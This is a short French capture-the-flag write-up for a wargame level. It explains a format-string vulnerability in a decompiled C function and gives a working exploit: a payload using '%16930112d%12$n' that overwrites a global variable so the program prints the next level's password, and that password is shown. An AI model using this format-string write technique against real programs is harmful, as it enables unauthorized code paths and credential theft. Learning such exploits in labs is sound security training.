# Level 4

meme chose que level 3 sauf que le debut de la format string a la 2 eme position sur la stack et m est comparer a un tres grand nombre:


#### code decompiler
```c
void n(void)

{
  char local_20c [520];
  
  fgets(local_20c,0x200,stdin);
  p(local_20c);
  if (m == 0x1025544) // si m = 16930116
	{
    system("/bin/cat /home/user/level5/.pass");
  }
  return;
}

```

(python -c 'print("\x10\x98\x04\x08" + "A" * 16930112" + "%12$n")'; cat -) | ./level4

ca n marche pas le terminal ne supporte pas autant de caractere donc on peut utiliser le formatage de largeur minimale du format string printf avec `%16930112d` ce format va imprimer 16930112 d'espace pour afficher le parametre

```bash
(python -c 'print("\x10\x98\x04\x08" + "%16930112d" + "%12$n")'; cat -) | ./level4
                                                                                        ...                                                                                -1208015184
0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a
```
on a un nombre random et le flag qui s'affiche

